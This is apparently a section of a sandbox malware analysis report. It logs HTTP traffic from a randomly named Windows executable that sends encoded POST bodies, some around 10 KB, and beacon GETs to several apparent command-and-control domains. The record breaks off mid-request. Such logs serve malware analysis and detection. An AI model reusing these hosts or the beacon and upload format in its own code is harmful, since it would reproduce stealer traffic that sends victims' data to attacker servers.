                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Connection: close
                                                                                                                                          Referer: http://www.sssvip2.shop/6t0f/
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                          Data Ascii: q0C=BaU2KBVO0kfEfARtNpMN9fV9wRtp8sDNErJfDO5Oh6x9KBXo3Nq/Kjbf8JtZgI+jtIADKjIc4XoiDOuetHPjAqYSGFwC60A3UoYgf9f6tpEpivvBq6srdwDGSeCDe6IOTWvQ7ud6H/KZBYop20rxw/JY+gC8vdPYzIClVizj2wOFLL5xl4ypYxKqC5gv5KuKvw==
                                                                                                                                          Dec 9, 2024 08:49:38.009567976 CET | 339 | IN | HTTP/1.1 302 Found
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Mon, 09 Dec 2024 07:49:37 GMT
                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Cache-control: no-cache,must-revalidate
                                                                                                                                          Location: /home/login
                                                                                                                                          Set-Cookie: PHPSESSID=fd04533ac3784a812578b181ba3ab03a; path=/
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          6 | 192.168.2.4 | 49853 | 156.253.8.115 | 80 | 4136 | C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 9, 2024 08:49:39.099911928 CET | 772 | OUT | POST /6t0f/ HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.sssvip2.shop
                                                                                                                                          Origin: http://www.sssvip2.shop
                                                                                                                                          Content-Length: 220
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Connection: close
                                                                                                                                          Referer: http://www.sssvip2.shop/6t0f/
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                          Data Ascii: q0C=BaU2KBVO0kfEfjZtd6UN8/V6zRtpr8DBErVfDPMRgJV9KlHo2PS/Pjbfk5tQkI+qtIN2Kmoc4TAiDPeeqw7gSKYMOlwAnkA3UoYgf9jUtospjffBqbskQQDBCOCDa6IKTWvy7s4vH8yZBZYpxmDynPJe6gDpl4m00KjbKBrUxjqfDt0r0JT+KxuZf+pb0JTD06eEVs3efu6VM+i6FZKav1o=
                                                                                                                                          Dec 9, 2024 08:49:40.675672054 CET | 339 | IN | HTTP/1.1 302 Found
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Mon, 09 Dec 2024 07:49:40 GMT
                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Cache-control: no-cache,must-revalidate
                                                                                                                                          Location: /home/login
                                                                                                                                          Set-Cookie: PHPSESSID=df3fb8e8eef5fa1b5b5049f6ca542d73; path=/
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          7 | 192.168.2.4 | 49861 | 156.253.8.115 | 80 | 4136 | C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 9, 2024 08:49:41.769617081 CET | 10854 | OUT | POST /6t0f/ HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.sssvip2.shop
                                                                                                                                          Origin: http://www.sssvip2.shop
                                                                                                                                          Content-Length: 10300
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Connection: close
                                                                                                                                          Referer: http://www.sssvip2.shop/6t0f/
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          8 | 192.168.2.4 | 49868 | 156.253.8.115 | 80 | 4136 | C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 9, 2024 08:49:44.432776928 CET | 493 | OUT | GET /6t0f/?q0C=MY8WJ01352TVXzFsNodd1NxUli1E4sLIDPBPQPgfoKZiJVfQ3vqQHTL/6etRwfvFnZBRJEUa5B9wCMX79XLhBfQQAkU843AvbtgeEKbWrrYxtYrhlbwkADc=&0vE=z2LXL2HhYNX8 HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.sssvip2.shop
                                                                                                                                          Connection: close
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                          Dec 9, 2024 08:49:46.022469997 CET | 339 | IN | HTTP/1.1 302 Found
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Mon, 09 Dec 2024 07:49:45 GMT
                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Cache-control: no-cache,must-revalidate
                                                                                                                                          Location: /home/login
                                                                                                                                          Set-Cookie: PHPSESSID=548ca5085e71b6c9aeda0dbe4c409997; path=/
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          9 | 192.168.2.4 | 49889 | 37.97.254.27 | 80 | 4136 | C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 9, 2024 08:49:52.912126064 CET | 779 | OUT | POST /7ujc/ HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.dutchdubliners.online
                                                                                                                                          Origin: http://www.dutchdubliners.online
                                                                                                                                          Content-Length: 200
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Connection: close
                                                                                                                                          Referer: http://www.dutchdubliners.online/7ujc/
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                          Data Ascii: q0C=btqA5+XgDXnu/wcvzFWS3snU9pyy8oA1BJuljvJ4V6ochdilVWmeK0VC46T7s40oZ+IT1iGl8j7vIDXzAmummpqjKsfjX9RDlK2/fwIKDySdXttJ+23EAJhnFzNe9UkxAI1NhVUpDsp1HlynCuF1uS2k0fcS6BVX+CVmE0sr8lzDlmUaTadn2q7ZIPi2Gn0PdQ==
                                                                                                                                          Dec 9, 2024 08:49:54.140669107 CET | 188 | IN | HTTP/1.0 403 Forbidden
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          10 | 192.168.2.4 | 49895 | 37.97.254.27 | 80 | 4136 | C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 9, 2024 08:49:55.578536034 CET | 799 | OUT | POST /7ujc/ HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.dutchdubliners.online
                                                                                                                                          Origin: http://www.dutchdubliners.online
                                                                                                                                          Content-Length: 220
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Connection: close
                                                                                                                                          Referer: http://www.dutchdubliners.online/7ujc/
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                          Data Ascii: q0C=btqA5+XgDXnu5TUvxiKSm8nXyJyy2IApBJqljrQ/JYMcvcSlUUOeHUVCzaT6xo0jZ/0l1gil8gHvIBPzDXul0pqhRcf9ItRDlK2/f0hvDyKdUd9J/X3FKphmNTNeskk1AI17hQ90DuR1Hn6nB/F0kS2YpPcEzlYMziEJD3863F/+kgZACr8wkqfqVIrCLkJGGcs9MZ1R9MirChGVTiWeUdI=
                                                                                                                                          Dec 9, 2024 08:49:56.801865101 CET | 188 | IN | HTTP/1.0 403 Forbidden
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          11 | 192.168.2.4 | 49901 | 37.97.254.27 | 80 | 4136 | C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 9, 2024 08:49:58.235910892 CET | 10881 | OUT | POST /7ujc/ HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.dutchdubliners.online
                                                                                                                                          Origin: http://www.dutchdubliners.online
                                                                                                                                          Content-Length: 10300
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Connection: close
                                                                                                                                          Referer: http://www.dutchdubliners.online/7ujc/
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                          Data Ascii: q0C=[TRUNCATED]
                                                                                                                                          Dec 9, 2024 08:49:59.457586050 CET | 188 | IN | HTTP/1.0 403 Forbidden
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          12 | 192.168.2.4 | 49908 | 37.97.254.27 | 80 | 4136 | C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 9, 2024 08:50:00.885998964 CET | 502 | OUT | GET /7ujc/?q0C=WvCg6J2jHD6L/TcyvzGm/cLTtunIwZsLDJOR2qctLrwbpbWmV0+8HmEyzKPQy50wJfwN5AO63TK9GRaTVCmcnK6BZOflUZJxlriydXV/Hhy/YqFf922rQpM=&0vE=z2LXL2HhYNX8 HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.dutchdubliners.online
                                                                                                                                          Connection: close
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                          Dec 9, 2024 08:50:02.120342016 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Tue, 02 Apr 2024 11:23:50 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Mon, 04 Mar 2024 08:41:05 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          X-Varnish: 870262511 34925
                                                                                                                                          Age: 21673571
                                                                                                                                          Via: 1.1 varnish (Varnish/6.1)
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 64674
                                                                                                                                          Connection: close
                                                                                                                                          Data Ascii: <!DOCTYPE html><html> <head lang="en"> <meta charset="ascii"> <title>TransIP - Reserved domain</title> <meta name="description" content="TransIP - Reserved domain"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <link rel="shortcut icon" href="//reserved.transip.nl/assets/img/favicon.ico" type="image/x-icon" /> <link href='https://fonts.googleapis.com/css?family=Source+Sans+Pro:400,900' rel='stylesheet' type='text/css'> <link rel="stylesheet" href="//reserved.transip.nl/assets/css/combined-min.css"> <title>Bezet!</title> </head> <body> <div class="container"> <div role="navigation" class="reserved-nav-container"> <div class="col-xs


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          13 | 192.168.2.4 | 49928 | 199.193.6.134 | 80 | 4136 | C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 9, 2024 08:50:08.102015972 CET | 752 | OUT | POST /rdvg/ HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.allstary.top
                                                                                                                                          Origin: http://www.allstary.top
                                                                                                                                          Content-Length: 200
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Connection: close
                                                                                                                                          Referer: http://www.allstary.top/rdvg/
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                          Data Ascii: q0C=eXfG9uSn/pWBzBP/tRt+38FrSroeitQpsKLADQu7g213jhBe2lzRf//cTXkxEc007xTVV/9mF9dC0F/Ige34z/Ev9H2A7rGdw1hJ684jh61pMTPkQ46hZv43W9KU2EhHstIoY5AZk2D57OAJaxanLVkEqzss7MXK6RToWnF22n5r3GrEoCFPUiWrLSrqyA1CvQ==
                                                                                                                                          Dec 9, 2024 08:50:09.327153921 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                          Date: Mon, 09 Dec 2024 07:50:09 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Content-Length: 389
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          14 | 192.168.2.4 | 49934 | 199.193.6.134 | 80 | 4136 | C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 9, 2024 08:50:10.765821934 CET | 772 | OUT | POST /rdvg/ HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.allstary.top
                                                                                                                                          Origin: http://www.allstary.top
                                                                                                                                          Content-Length: 220
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Connection: close
                                                                                                                                          Referer: http://www.allstary.top/rdvg/
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                          Data Ascii: q0C=eXfG9uSn/pWB1Rf/v2Z+xcFsO7oeoNQtsKHADRqRglR3tjZe3nbRY//cHHl1K80j7xfnV6FmF9JC0HnIhpj/zvEtoX2GmbGdw1hJ68t0h6tpPi/kQaSgH/40R9KUyEhDstIwY74zk1757L8JajygEVkCuztboe+o7AmHV2ts1GRX7gme5zkYGiyYWVie/DIL0envdKBlUbxZSxBOwHMwudM=
                                                                                                                                          Dec 9, 2024 08:50:11.985996962 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                          Date: Mon, 09 Dec 2024 07:50:11 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Content-Length: 389
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          15 | 192.168.2.4 | 49941 | 199.193.6.134 | 80 | 4136 | C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 9, 2024 08:50:13.423752069 CET | 10854 | OUT | POST /rdvg/ HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.allstary.top
                                                                                                                                          Origin: http://www.allstary.top
                                                                                                                                          Content-Length: 10300
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Connection: close
                                                                                                                                          Referer: http://www.allstary.top/rdvg/
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                          Data Ascii: q0C= [TRUNCATED]
                                                                                                                                          Dec 9, 2024 08:50:14.707390070 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                          Date: Mon, 09 Dec 2024 07:50:14 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Content-Length: 389
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          16 | 192.168.2.4 | 49947 | 199.193.6.134 | 80 | 4136 | C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 9, 2024 08:50:16.073834896 CET | 493 | OUT | GET /rdvg/?q0C=TV3m+ZuR+MuvljvWunhewpdSMahlra0ppdriKzCX4142lV8I6FTOceHwOQEpd9UFqQTrUY1AGfMzy32q1OrbtcsJ52Sl7Z/04EVens9SqotHLWuAZYLLbuM=&0vE=z2LXL2HhYNX8 HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.allstary.top
                                                                                                                                          Connection: close
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                          Dec 9, 2024 08:50:17.301317930 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                                                                          Date: Mon, 09 Dec 2024 07:50:17 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Content-Length: 389
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          17 | 192.168.2.4 | 49968 | 149.104.34.134 | 80 | 4136 | C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 9, 2024 08:50:24.680794001 CET | 758 | OUT | POST /ah82/ HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.16v9tiu00r.ink
                                                                                                                                          Origin: http://www.16v9tiu00r.ink
                                                                                                                                          Content-Length: 200
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Connection: close
                                                                                                                                          Referer: http://www.16v9tiu00r.ink/ah82/
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                          Data Ascii: q0C=ULsS1oq9RVklVOoh38CnEitbkOWikK9hLldXJoWBzew6pRWt4/yKAwdcOSy4IwWB4fqtIb7II+Ij40e0KGBFsl7vgzX6A+BBvIjLQInBCwQciv4Teuur4bZh99iIcgzopSznSthxW8/5bXf+jl1+rqbycmZR3f0dZPva0ncmWLfmulXd7y0QF7gazSd8fRdBRg==
                                                                                                                                          Dec 9, 2024 08:50:26.244307995 CET | 218 | IN | HTTP/1.1 404 Not Found
                                                                                                                                          Date: Mon, 09 Dec 2024 07:50:25 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 7931
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: X-SUDUN-WAF-R-C=0001693096; path=/
                                                                                                                                          ETag: "67516c07-1efb"
                                                                                                                                          Server: Anti-CDN
                                                                                                                                          Dec 9, 2024 08:50:26.244324923 CET | 1236 | IN |
                                                                                                                                          Data Ascii: <!doctype html><html> <head> <meta charset="utf-8"> <title>DDNN404</title> <meta http-equiv="X-UA-Compatible" content="IE=edge,Chrome=1"/> <meta name="viewport" content="width=device-width, initial-sc
                                                                                                                                          Dec 9, 2024 08:50:26.244477987 CET | 1236 | IN |
                                                                                                                                          Data Ascii: footer, header, hgroup, menu, nav, section { display: block; } body { line-height: 1; } ol, ul { list-style: none; } bl
                                                                                                                                          Dec 9, 2024 08:50:26.244491100 CET | 1236 | IN |
                                                                                                                                          Data Ascii: : 22px;font-size: 55px;color:#666;} .img-line{margin-top: 10px;} .host-info{margin-top: 10px;color: #666;font-size: 18px;font-weight: 200;} .host-info-mar{margin-left: 20px;} @media screen and (
                                                                                                                                          Dec 9, 2024 08:50:26.244503975 CET | 1236 | IN |
                                                                                                                                          Data Ascii: #err_code{font-size: 60px;} #tpis_cn{font-size: 30px;} .err-tips-en{font-size: 25px;} .host-info{font-size: 15px;} } @media screen and (max-width:359px){
                                                                                                                                          Dec 9, 2024 08:50:26.245135069 CET | 1236 | IN |
                                                                                                                                          Data Ascii: cn{margin-top: 250px;} .w321 #err_code{font-size: 60px;} .w321 #tpis_cn{font-size: 30px;} .w321 .err-tips-en{font-size: 25px;} .w321 .host-info{font-size: 15px;} .lt-w320 .err-tips-c
                                                                                                                                          Dec 9, 2024 08:50:26.245153904 CET | 1236 | IN |
                                                                                                                                          Data Ascii: emote_addr; var cloudNode = $server_addr; var showContent = function () { document.getElementById("ip").textContent = ip; document.getElementById("cloud_node").textContent = cloudNode;
Dec 9, 2024 08:50:26.245166063 CET | 515 | IN
                                                                                                                                          Data Ascii: document.body.className = "w321"; } else { document.body.className = "lt-w320"; } }; window.onload = function () { showContent();


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49974 | 149.104.34.134 | 80 | 4136 | C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 08:50:27.379339933 CET | 778 | OUT | POST /ah82/ HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.16v9tiu00r.ink
                                                                                                                                          Origin: http://www.16v9tiu00r.ink
                                                                                                                                          Content-Length: 220
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Connection: close
                                                                                                                                          Referer: http://www.16v9tiu00r.ink/ah82/
